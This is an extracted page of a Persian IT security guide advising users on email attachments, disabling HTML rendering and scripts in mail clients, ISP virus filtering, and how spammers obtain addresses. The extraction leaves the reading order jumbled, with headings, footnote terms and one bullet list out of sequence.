ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﭼﻮﻥ Adobe Acrobat Readerﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺑﻴﺸﺘﺮﻱ ﻣﻴـﺎﻥ
ﺍﻓﺮﺍﺩ ﺩﺍﺭﺩ ﺧﻄﺮ ﺧﺎﺻﻲ ﺩﺭ ﭘﻲ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ( .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻫﻨﻤـﺎﻱ
ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﺭﺍﻫﻨﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﭼﮕﻮﻧﻪ
ﻣﻲﺗﻮﺍﻥ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻨـﺪﺭﺕ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ( ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ.
ﻫﺮﮔﺰ ﺿﻤﺎﺋﻢ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﺟﺎﻧﺐ ﺍﻓﺮﺍﺩ ﺷﻨﺎﺧﺘﻪﺷـﺪﻩ ﻭ
ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﻴﺰ ﺑﺎﺯ ﻧﻜﻨﻴﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺍﻃﻤﻴﻨـﺎﻥ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓـﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺍﻳـﻦ ﺿـﻤﺎﺋﻢ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﺑﺎ ﻣﻼﺣﻈـﻪ ﻛﺎﻣـﻞ ﺑﺮﺍﻳﺘـﺎﻥ ﺍﺭﺳـﺎﻝ
ﻧﻤﻮﺩﻩ ﺍﺳﺖ.
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻴﻦ ﺩﻭﺳﺖ ﺷﻤﺎ ﻭﻳﺮﻭﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ
ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ ﻫﻤـﺔ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ
ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻭﻱ ﻫﺴﺘﻨﺪ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﺪ.
ﻗﺎﻧﻮﻥ ﻧﻬﻢ:
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ
ﻛﻨﻴﺪ ﺗﺎ ﻓﺎﻳﻠﻬﺎﻱ HTMLﺗﻔﻨﻨﻲ ٦٧ﺭﺍ ﭘﺮﺩﺍﺯﺵ ﻧﻜﻨﺪ ﻭ
ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟﻮﺩﻩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ.
ﺍﺯ ISPﺧﻮﺩ ﺳـﺆﺍﻝ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺭﺳـﺎﻝ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻭﻳﺮﻭﺱ
ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ.
ﺑﻪ ﺩﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻌﺎﻟﻴـﺖ ﻛﺮﻣﻬـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﺍﻛﺜـﺮ
ISPﻫﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻧﺒﺎﻳـﺪ
ﺗﻮﻗﻊ ﺩﺍﺷﺖ ﻛﻪ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ISPﺷﻤﺎ ﺻﺪ ﺩﺭﺻـﺪ ﺛﻤـﺮﺑﺨﺶ
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ISPﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺗﻼﺷـﻬﺎﻱ
ﺷﻤﺎ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ .ﺍﮔﺮ ISPﺷـﻤﺎ ﺍﺯ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻩ ﻧﻴﺴﺖ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ ﺍﻣـﻦﺗـﺮ ﺑـﻪ
ﻼ
ﺧﻮﺩﺗﺎﻥ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺎ ﺁﻧﻬـﺎ ﻫﻤﻜـﺎﺭﻱ ﻛﻨﻴـﺪ .ﻣـﺜ ﹰ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﺘﺎﺑﻲ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﻣـﺸﻐﻮﻝ ﻣﻄﺎﻟﻌـﻪ
ﺁﻥ ﻫﺴﺘﻴﺪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻫﺪﻳﻪ ﻧﻤﺎﻳﻴﺪ!
ﻫﺮﺯﻧﺎﻣﻪ
ﻫﺮﺯﻧﺎﻣﻪ ٦٩ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ
ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ،ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ ﺍﻓـﺮﺍﺩ
ﻻ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﻛـﻪ
ﻧﺎﺷﻨﺎﺱ ﻭ ﺑﺼﻮﺭﺕ ﻣﺘﻌﺪﺩ -ﺍﺣﺘﻤﺎ ﹰ
ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪﻩ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﺁﻧﻬـﺎ ﻋﻼﻗـﻪﻣﻨـﺪ ﺧﻮﺍﻫـﺪ ﺷـﺪ -
ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﻧﺪ .ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺗﻌـﺪﺍﺩ ﻫﺮﺯﻧﺎﻣـﻪ ﻫـﺎ ﺑﻄـﻮﺭ
ﭼﺸﻤﮕﻴﺮﻱ ﺍﻓﺰﺍﻳﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﺑـﻴﺶ ﺍﺯ %۵۰
ﺍﺯ ﻛﻞ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺒﺎﺩﻝﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻫﺮﺯﻧﺎﻣـﻪ
ﺑﻮﺩﻩ ﺍﺳﺖ! ﺑﺴﻴﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻫﻢ ﺍﻛﻨﻮﻥ ﺑﻪ ﺍﺯﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻫـﺮ ﻳـﻚ
ﻧﺎﻣﺔ ﻣﻌﺘﺒﺮ ﺣﺪﻭﺩ ۱۰ﻫﺮﺯﻧﺎﻣﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ.
ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺰﺋﻴﻨﻲ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ،ﻭﻟﻲ ﺩﺭ ﻋﻮﺽ ﻛﻨﺘﺮﻝ
ﺑﻬﺘﺮﻱ ﺭﻭﻱ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﺔ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺧـﻮﺩ ﺑﺪﺳـﺖ
ﺁﻭﺭﻳﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛـﺪ HTMLﺣﺘـﻲ ﻻﺯﻡ ﻧﻴـﺴﺖ
ﭘﻴﺎﻣﻲ ﻛﻪ ﺣﺎﻭﻱ ﻛﺪ HTMLﺍﺳﺖ ﺭﺍ ﺑﺎﺯ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑـﻪ ﻧﻤـﺎﻳﺶ
ﺩﺭ ﺁﻣﺪﻥ ﺁﻥ ﭘﻴﺎﻡ ﺩﺭ ﺻﻔﺤﺔ ﭘﻴﺶﻧﻤﺎﻳﺶ ٦٨ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛﺪ
ﻛﺎﻓﻲ ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺎﻭﻱ
ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ HTMLﺑﺎﺷـﺪ ﺍﻣـﺎ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﻭ
ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﻪ ﺷــﻤﺎ ﺍﺟــﺎﺯﻩ ﻣــﻲﺩﻫﻨــﺪ
،Javascript ،cookieﻭ plug-inﺻــﻔﺤﺎﺗﻲ ﻛــﻪ ﺑﻌﻨــﻮﺍﻥ
ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ
ﻧﻤﺎﻳﻴﺪ.
ﺍﮔــﺮ ﺩﺭ ﻓﻴﻠــﺪ "ﻣﻮﺿــﻮﻉ" ﻫﺮﺯﻧﺎﻣــﻪﻫــﺎ ﻋﺒﺎﺭﺗﻬــﺎﻳﻲ ﻧﻈﻴــﺮ
"** "**SPAMﻭﺟﻮﺩ ﻣﻲﺩﺍﺷﺖ ،ﺁﻧﮕﺎﻩ ﻣﻲ ﺗﻮﺍﻧﺴﺘﻴﻢ ﺑﻪ ﺁﺳـﺎﻧﻲ
ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﻢ .ﻗﻮﺍﻧﻴﻦ ﻣﺼﻮﺏ ﻗﻀﺎﻳﻲ ﺣﻜﻢ ﻣﻲﻛﻨﺪ
ﻛﻪ ﻫﺮ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻛـﻪ ﺍﺯ ﺳـﻮﻱ ﺷـﺮﻛﺘﻬﺎﻱ
ﺗﺠﺎﺭﻱ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ
ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭﺳـﻴﻊ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﻭ ﻧﻴـﺰ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﻣﺤـﺪﻭﺩ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ
ﻋﻤﻠﻲ ﻧﻴﺴﺖ .ﻫﺮﻛﺲ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻭ ﻳـﺎ ﺍﺭﺳـﺎﻝ
ﺍﺧﻄﺎﺭ ﺑﻪ ﻳﻚ ﺳﻴـﺴﺘ ﹺﻢ ﺷـﻠﻮ ﹺﻍ ﺩﺭﻳﺎﻓـﺖ ﺷـﻜﺎﻳﺖ ،ﻳـﻚ ﺭﻭﺵ
ﻣﻨﻄﻘﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻭ ﺣﺬﻑ ﺁﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
67
68
69
Fancy HTML
Preview Screen
Spam
ﺑﺨﺶ ﺩﻭﻡ
ﻗﺎﻧﻮﻥ ﻫﺸﺘﻢ:
ﻗﺎﻧﻮﻥ ﺩﻫﻢ:
٨٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﺷﻨﺎﻳﻲ ﺑﻴﺸﺘﺮ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ
•
ﻳﻚ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ٧٣ﺑﺮﺍﻱ ﺧﻮﺩ ﺛﺒﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ
ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﮔﺮﻭﻩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻳﻚ ﭘﺎﻳﮕﺎﻩ
ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ.
•
ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﭘـﺴﺘﻲ ﻗﺎﺑـﻞ ﺣـﺪﺱ ﺯﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
•
ﻼ
ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻜﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒ ﹰ
ﺑﻪ ﺁﻧﻬﺎ ﻧﻔﻮﺫ ﺷﺪﻩ ﺍﺳﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ.
ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺩﺭ ﭘـﻲ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ ﺳـﻪ
ﻧﻜﺘﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ:
ﺍﻟﻒ( ﭼﮕﻮﻧﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ.
ﺏ( ﭼﻪ ﭼﻴﺰﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ )ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺩﻗﻴﻖ(.
ﺝ( ﭼﺮﺍ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﺍﻟــﻒ( ﺍﮔــﺮ ﻳﻜــﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﺯﻳــﺮ ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ
ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﻣﻮﻗﻌﻴﺖ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ
ﺩﺍﺭﻧﺪ:
•
ﻧﺎﻣﻪ ﻳﺎ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻳـﻚ ﻓﻬﺮﺳـﺖ ﺁﺩﺭﺱ
ﻋﻤﻮﻣﻲ ٧٠ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
•
ﻼ ﺧﻮﺍﺳـﺘﻪ
ﺑﻪ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻣـﺜ ﹰ
ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﺯ ﻓﻬﺮﺳـﺖ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﮔﺎﻥ ﺣـﺬﻑ
ﺷﻮﻳﺪ.
•
ﺑﺮﺍﻱ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ٧١ﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﻴﺪ.
•
ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﻳـﻚ ﻓـﺮﻡ ﻭﺏ ﺛﺒـﺖ ﻧـﺎﻡ ﻛـﺮﺩﻩ
ﺑﺎﺷﻴﺪ ﻭ ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﻭﺍﺭﺩ ﻧﻤـﻮﺩﻩ ﺑﺎﺷـﻴﺪ
ﻼ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻣﻌﺘﺒـﺮﻱ
)ﺣﺘﻲ ﺍﮔﺮ ﻛﺎﻣ ﹰ
ﻣﺮﺍﺟﻌﻪ ﻧﻤﻮﺩﻩﺍﻳﺪ(.
•
ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ٧٢ﺭﻭﻱ ﺁﻥ
ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ )ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ
ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ ﺻـﺪﻕ ﻛﻨـﺪ ﺍﺣﺘﻤـﺎﻝ
ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺁﺩﺭﺱ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ
ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﻭﺧﺘﻪ ﺷـﻮﺩ .ﺑـﻪ
ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺍﻳـﻦ
ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ
ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﺏ( ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﻪ ﺩﻟﻴﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﻭ ﻧﺎﻣﺮﺑﻮﻁ
ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﻪ ﻣﻲﺩﺍﻧﻨﺪ ﻛـﻪ
ﺑﻮﺩﻧﺸﺎﻥ ﻛﺎﻣ ﹰ
ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺑﻌﻀﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺩﻳﮕـﺮ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﻛﻤﺘﺮ ﺁﺷﻜﺎﺭ ﺍﺳﺖ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ
ﺑﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳـﺎﻓﺘﻲ
ﺭﺍ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺪﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﻣﺜﺎﻟﻬﺎﻱ ﺯﻳﺮ ﺑـﻪ ﺭﻭﺷـﻦ ﺷـﺪﻥ
ﺑﻴﺸﺘﺮ ﻣﻮﺿﻮﻉ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ:
•
ﺁﻳﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ
ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕﻲ ﻣﺮﺍﻗﺒﺖ ﺍﺯ ﺍﺟـﺰﺍﻱ ﺻـﻮﺭﺕ ﺍﺳـﺖ
ﻳــﻚ ﻫﺮﺯﻧﺎﻣــﻪ ﺑــﻪ ﺷــﻤﺎﺭ ﻣــﻲﺭﻭﺩ؟ ﭘﺎﺳــﺦ :ﺑﻠــﻪ،
ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺟـﺮﺍﺡ ﭘﻼﺳـﺘﻴﻚ
ﺑﺎﺷــﻴﺪ ﻭ ﺍﻳــﻦ ﻧﺎﻣــﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳــﻚ ﻣﻘﺎﻟــﺔ
ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎﺷﺪ ﻭ ﻧﻪ ﻳﻚ ﺁﮔﻬﻲ ﺗﺠﺎﺭﻱ.
•
ﺁﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻘﺎﻟﻪ ﺍﺯ ﺷﻤﺎ ﺑﺮﺍﻱ ﻳﻚ ﮔﺮﺩﻫﻤـﺎﻳﻲ
ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎ ﻣﻮﺿـﻮﻋﻲ ﻣـﺒﻬﻢ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪﻳﻦ
ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺸﻤﺎﺭ
ﻣﻲﺭﻭﺩ؟ ﭘﺎﺳﺦ :ﺷﺎﻳﺪ .ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺑﻄـﻮﺭ ﺍﺗﻔـﺎﻗﻲ
ﻣﻮﺿﻮﻉ ﺁﻥ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺑﺎﺷﺪ ﻭ ﻣﺎﻳﻞ ﺑﺎﺷـﻴﺪ
ﺑﻪ ﺁﻥ ﭘﺎﺳﺦ ﺩﻫﻴﺪ.
•
ﺷــﺮﻛﺘﻲ ﻛــﻪ ﺑــﻪ ﺷــﻤﺎ ﻣﺤــﺼﻮﻟﻲ ﻓﺮﻭﺧﺘــﻪ ﻭ
ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻝ ﺑﻌﺪﻱ ﺧﻮﺩ ﺑـﺮﺍﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIXﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ
ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻫﺮ ﻛﺲ ﻛﻪ ﺁﻧﺮﺍ ﺳﺆﺍﻝ ﻛﻨﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ(.
•
ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ
ﻛﻨﺪ.
•
ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩ
ﺑﺎﺷﻴﺪ.
•
ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻳـﻚ ﺻـﻔﺤﺔ ﻭﺏ ﻗـﺮﺍﺭ
